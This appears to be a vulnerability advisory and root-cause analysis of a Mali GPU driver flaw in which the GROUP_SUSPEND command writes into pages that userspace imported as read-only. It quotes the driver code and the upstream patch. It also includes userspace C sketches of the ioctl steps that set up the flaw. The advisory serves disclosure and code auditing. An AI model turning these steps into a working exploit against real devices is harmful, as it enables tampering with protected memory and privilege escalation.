Disclosure or Patch Date: Patched in Valhall r40p0, released on 7 October 2022
Product: Arm Mali GPU driver for Linux/Android
Advisory (from Arm, upstream): https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities
Affected Versions: see Arm advisory
First Patched Version: Valhall r40p0
Bug class: Broken access control logic
Vulnerability details:
The ioctl handler of the Mali driver supports the command KBASE_IOCTL_KCPU_QUEUE_ENQUEUE:
	case KBASE_IOCTL_KCPU_QUEUE_ENQUEUE:
		KBASE_HANDLE_IOCTL_IN(KBASE_IOCTL_KCPU_QUEUE_ENQUEUE,
				kbasep_kcpu_queue_enqueue,
				struct kbase_ioctl_kcpu_queue_enqueue,
				kctx);
		break;
We can use KBASE_IOCTL_KCPU_QUEUE_ENQUEUE to enqueue commands into a KCPU queue. For example, we can use it to enqueue the queue command BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND.
The queue command BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND is handled by the function kbase_csf_kcpu_queue_enqueue: the command is first prepared by the function kbase_csf_queue_group_suspend_prepare and later processed by the function kbase_csf_queue_group_suspend_process.
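For illustration, a minimal userspace sketch of enqueuing such a command might look like the following. It assumes the Mali UAPI headers are available and that a KCPU queue and a queue group have already been created on the device fd; the helper name enqueue_group_suspend and its parameters are hypothetical, and the exact ioctl numbers and struct layouts (kbase_ioctl_kcpu_queue_enqueue, base_kcpu_command, base_kcpu_command_group_suspend_info) should be taken from the headers matching the target driver version:
#include <stdint.h>
#include <sys/ioctl.h>
/* Mali UAPI headers; exact paths and struct layouts vary by driver release */
#include "mali_kbase_ioctl.h"
#include "mali_kbase_csf_ioctl.h"

/* Hedged sketch: enqueue one GROUP_SUSPEND command on an existing KCPU queue.
 * `mali_fd` is an open /dev/mali0 file descriptor on which a KCPU queue
 * (kcpu_queue_id) and a queue group (group_handle) have already been created.
 */
static int enqueue_group_suspend(int mali_fd, uint8_t kcpu_queue_id,
				 uint8_t group_handle, void *dst_buf,
				 uint32_t suspend_size)
{
	struct base_kcpu_command cmd = { 0 };
	struct kbase_ioctl_kcpu_queue_enqueue enq = { 0 };

	cmd.type = BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND;
	/* Destination buffer the driver will copy the suspend buffer into */
	cmd.info.suspend_buf_copy.buffer = (uint64_t)(uintptr_t)dst_buf;
	cmd.info.suspend_buf_copy.size = suspend_size;
	cmd.info.suspend_buf_copy.group_handle = group_handle;

	enq.addr = (uint64_t)(uintptr_t)&cmd;
	enq.nr_commands = 1;
	enq.id = kcpu_queue_id;

	return ioctl(mali_fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &enq);
}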
First of all, let's have a look at the function kbase_csf_queue_group_suspend_prepare. This function prepares the destination pages to which the suspend buffer will be copied:
static int kbase_csf_queue_group_suspend_prepare(
		struct kbase_kcpu_command_queue *kcpu_queue,
		struct base_kcpu_command_group_suspend_info *suspend_buf,
		struct kbase_kcpu_command *current_command)
{
	struct kbase_context *const kctx = kcpu_queue->kctx;
	struct kbase_suspend_copy_buffer *sus_buf = NULL;
	u64 addr = suspend_buf->buffer;
	u64 page_addr = addr & PAGE_MASK;
	u64 end_addr = addr + suspend_buf->size - 1;
	u64 last_page_addr = end_addr & PAGE_MASK;
	int nr_pages = (last_page_addr - page_addr) / PAGE_SIZE + 1;
	int pinned_pages = 0, ret = 0;
	struct kbase_va_region *reg;

	lockdep_assert_held(&kctx->csf.kcpu_queues.lock);

	if (suspend_buf->size <
			kctx->kbdev->csf.global_iface.groups[0].suspend_size)
		return -EINVAL;

	ret = kbase_csf_queue_group_handle_is_valid(kctx,
			suspend_buf->group_handle);
	if (ret)
		return ret;

	sus_buf = kzalloc(sizeof(*sus_buf), GFP_KERNEL);
	if (!sus_buf)
		return -ENOMEM;

	sus_buf->size = suspend_buf->size;
	sus_buf->nr_pages = nr_pages;
	sus_buf->offset = addr & ~PAGE_MASK;

	sus_buf->pages = kcalloc(nr_pages, sizeof(struct page *), GFP_KERNEL);
	if (!sus_buf->pages) {
		ret = -ENOMEM;
		goto out_clean_sus_buf;
	}

	/* Check if the page_addr is a valid GPU VA from SAME_VA zone,
	 * otherwise consider it is a CPU VA corresponding to the Host
	 * memory allocated by userspace.
	 */
	kbase_gpu_vm_lock(kctx);
	reg = kbase_region_tracker_find_region_enclosing_address(kctx,
			page_addr);

	if (kbase_is_region_invalid_or_free(reg)) {
		kbase_gpu_vm_unlock(kctx);
		pinned_pages = get_user_pages_fast(page_addr, nr_pages, 1, //<--------- get the destination pages from user address directly!
				sus_buf->pages);
		kbase_gpu_vm_lock(kctx);

		if (pinned_pages < 0) {
			ret = pinned_pages;
			goto out_clean_pages;
		}
		if (pinned_pages != nr_pages) {
			ret = -EINVAL;
			goto out_clean_pages;
		}
	} else {
		struct tagged_addr *page_array;
		u64 start, end, i;

		if (!(reg->flags & BASE_MEM_SAME_VA) ||
				reg->nr_pages < nr_pages ||
				kbase_reg_current_backed_size(reg) !=
					reg->nr_pages) {
			ret = -EINVAL;
			goto out_clean_pages;
		}

		start = PFN_DOWN(page_addr) - reg->start_pfn;
		end = start + nr_pages;

		if (end > reg->nr_pages) {
			ret = -EINVAL;
			goto out_clean_pages;
		}

		sus_buf->cpu_alloc = kbase_mem_phy_alloc_get(reg->cpu_alloc);
		kbase_mem_phy_alloc_kernel_mapped(reg->cpu_alloc);
		page_array = kbase_get_cpu_phy_pages(reg); //<------------------- get the destination pages from a valid region !!!
		page_array += start;

		for (i = 0; i < nr_pages; i++, page_array++)
			sus_buf->pages[i] = as_page(*page_array); //<------------ the destination pages get stored in the "sus_buf->pages"
	}

	kbase_gpu_vm_unlock(kctx);
	current_command->type = BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND;
	current_command->info.suspend_buf_copy.sus_buf = sus_buf;
	current_command->info.suspend_buf_copy.group_handle =
			suspend_buf->group_handle;
	return ret;

out_clean_pages:
	kbase_gpu_vm_unlock(kctx);
	kfree(sus_buf->pages);
out_clean_sus_buf:
	kfree(sus_buf);
	return ret;
}
As you can see, the destination pages are stored in the array sus_buf->pages. Interestingly, there are two ways the destination pages can be obtained. The first is to pin the pages directly from the user address with the kernel API get_user_pages_fast; note that this call passes 1 (write) as its third argument, so read-only user mappings cannot be pinned on this path. The second is to take the pages from a valid region. Let's pay attention to the second way.
We know that a region can be created in many ways, corresponding to different ioctl commands. What if a region is created by the ioctl command KBASE_IOCTL_MEM_IMPORT? With KBASE_IOCTL_MEM_IMPORT, we can create a region by importing user pages, and these user pages become the backing pages of the region. Crucially, we can also import read-only user pages with this command. As a result, we can get a region whose pages are read-only.
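As a rough sketch (not a full exploit), importing a read-only user buffer could look something like the code below. The helper name import_readonly_pages is hypothetical, and the flag combination is illustrative only; whether the resulting region actually ends up in the SAME_VA zone and passes the checks in the vulnerable function depends on the driver version, so treat this purely as an illustration of the import step:
#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
/* Mali UAPI headers; exact paths and struct layouts vary by driver release */
#include "mali_kbase_ioctl.h"

/* Hedged sketch: import CPU-read-only user pages as a kbase region.
 * The pages come from a read-only file mapping, so they cannot normally
 * be written from the CPU side.
 */
static uint64_t import_readonly_pages(int mali_fd, const char *path, size_t len)
{
	int tfd = open(path, O_RDONLY);
	void *ro = mmap(NULL, len, PROT_READ, MAP_PRIVATE, tfd, 0);

	struct base_mem_import_user_buffer ub = {
		.ptr = (uint64_t)(uintptr_t)ro,
		.length = len,
	};

	union kbase_ioctl_mem_import imp = { 0 };
	imp.in.phandle = (uint64_t)(uintptr_t)&ub;
	imp.in.type = BASE_MEM_IMPORT_TYPE_USER_BUFFER;
	/* Illustrative flags only: readable, but no CPU-write permission */
	imp.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD;

	if (ioctl(mali_fd, KBASE_IOCTL_MEM_IMPORT, &imp) < 0)
		return 0;

	return imp.out.gpu_va; /* GPU VA of the imported region */
}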
Let's get back to the function kbase_csf_queue_group_suspend_prepare. As you can see, there is no check that the pages obtained from a valid region are writable on the CPU side, so read-only pages can be stored into sus_buf->pages!
Since the pages in sus_buf->pages can be read-only, the write to read-only pages happens in the function kbase_csf_scheduler_group_copy_suspend_buf when the suspend buffer is copied:
int kbase_csf_scheduler_group_copy_suspend_buf(struct kbase_queue_group *group,
		struct kbase_suspend_copy_buffer *sus_buf)
{
	struct kbase_context *const kctx = group->kctx;
	struct kbase_device *const kbdev = kctx->kbdev;
	struct kbase_csf_scheduler *const scheduler = &kbdev->csf.scheduler;
	int err = 0;

	kbase_reset_gpu_assert_prevented(kbdev);
	lockdep_assert_held(&kctx->csf.lock);
	mutex_lock(&scheduler->lock);

	if (kbasep_csf_scheduler_group_is_on_slot_locked(group)) {
		DECLARE_BITMAP(slot_mask, MAX_SUPPORTED_CSGS) = {0};

		set_bit(kbase_csf_scheduler_group_get_slot(group), slot_mask);

		if (!WARN_ON(scheduler->state == SCHED_SUSPENDED))
			suspend_queue_group(group);
		err = wait_csg_slots_suspend(kbdev, slot_mask,
				kbdev->csf.fw_timeout_ms);
		if (err) {
			dev_warn(kbdev->dev, "[%llu] Timeout waiting for the group %d to suspend on slot %d",
				 kbase_backend_get_cycle_cnt(kbdev),
				 group->handle, group->csg_nr);
			goto exit;
		}
	}

	if (queue_group_suspended_locked(group)) {
		unsigned int target_page_nr = 0, i = 0;
		u64 offset = sus_buf->offset;
		size_t to_copy = sus_buf->size;

		if (scheduler->state != SCHED_SUSPENDED) {
			/* Similar to the case of HW counters, need to flush
			 * the GPU cache before reading from the suspend buffer
			 * pages as they are mapped and cached on GPU side.
			 */
			kbase_gpu_start_cache_clean(kbdev);
			kbase_gpu_wait_cache_clean(kbdev);
		} else {
			/* Make sure power down transitions have completed,
			 * i.e. L2 has been powered off as that would ensure
			 * its contents are flushed to memory.
			 * This is needed as Scheduler doesn't wait for the
			 * power down to finish.
			 */
			kbase_pm_wait_for_desired_state(kbdev);
		}

		for (i = 0; i < PFN_UP(sus_buf->size) &&
				target_page_nr < sus_buf->nr_pages; i++) {
			struct page *pg =
				as_page(group->normal_suspend_buf.phy[i]);
			void *sus_page = kmap(pg);

			if (sus_page) {
				kbase_sync_single_for_cpu(kbdev,
					kbase_dma_addr(pg),
					PAGE_SIZE, DMA_BIDIRECTIONAL);
				err = kbase_mem_copy_to_pinned_user_pages( //<---------------- the write to read-only memory pages happens here !!!!!
						sus_buf->pages, sus_page,
						&to_copy, sus_buf->nr_pages,
						&target_page_nr, offset);
				kunmap(pg);
				if (err)
					break;
			} else {
				err = -ENOMEM;
				break;
			}
		}
		schedule_in_cycle(group, false);
	} else {
		/* If addr-space fault, the group may have been evicted */
		err = -EIO;
	}

exit:
	mutex_unlock(&scheduler->lock);
	return err;
}
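The reason the CPU-side read-only protection does not help is that the destination pages are written through temporary kernel mappings, not through the user's page tables. The snippet below is not the driver's code; it is a hedged, generic sketch (with a hypothetical helper name) of how a kernel helper shaped like kbase_mem_copy_to_pinned_user_pages can write into a pinned page via kmap, regardless of how userspace mapped it:
#include <linux/errno.h>
#include <linux/highmem.h>
#include <linux/mm.h>
#include <linux/string.h>

/* Hedged sketch (not the driver's actual implementation): once a struct page
 * has been captured in sus_buf->pages, the kernel can write to it through a
 * temporary kernel mapping. The userspace PTE permissions (read-only) are
 * never consulted on this path.
 */
static int copy_to_pinned_page_sketch(struct page *dst_page, const void *src,
				      size_t len, unsigned int offset)
{
	void *dst;

	if (offset + len > PAGE_SIZE)
		return -EINVAL;

	dst = kmap(dst_page);		/* kernel mapping of the pinned page */
	if (!dst)
		return -ENOMEM;

	memcpy(dst + offset, src, len);	/* the write lands in the page itself,
					 * even if userspace mapped it read-only */
	kunmap(dst_page);
	return 0;
}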
The issue has been fixed in the Valhall r40p0 driver release. The patch looks like this:
@@ -669,9 +671,12 @@ static int kbase_csf_queue_group_suspend_prepare(
 		u64 start, end, i;
 		if (((reg->flags & KBASE_REG_ZONE_MASK) != KBASE_REG_ZONE_SAME_VA) ||
-		    reg->nr_pages < nr_pages ||
-		    kbase_reg_current_backed_size(reg) !=
-			    reg->nr_pages) {
+		    (kbase_reg_current_backed_size(reg) < nr_pages) ||
+		    !(reg->flags & KBASE_REG_CPU_WR) ||
+		    (reg->gpu_alloc->type != KBASE_MEM_TYPE_NATIVE) ||
+		    (reg->flags & KBASE_REG_DONT_NEED) ||
+		    (reg->flags & KBASE_REG_ACTIVE_JIT_ALLOC) ||
+		    (reg->flags & KBASE_REG_NO_USER_FREE)) {
 			ret = -EINVAL;
 			goto out_clean_pages;
 		}
As you can see, reg->flags is now checked to make sure, among other things, that the region is CPU-writable (KBASE_REG_CPU_WR).
Variant analysis and code auditing:
Jann Horn from Google Project Zero has done some great work finding similar vulnerabilities in the Mali GPU driver that make read-only imported pages host-writable. In the report https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-39793.html, he disclosed details of CVE-2022-22706, CVE-2021-28664, and CVE-2021-44828. All three vulnerabilities make read-only imported pages host-writable.
After analyzing the report thoroughly, it occurred to me that there might be more similar vulnerabilities in the Mali driver. After a long time of reading the source code, I finally found this issue. Just like those vulnerabilities, this one can also make read-only imported pages host-writable!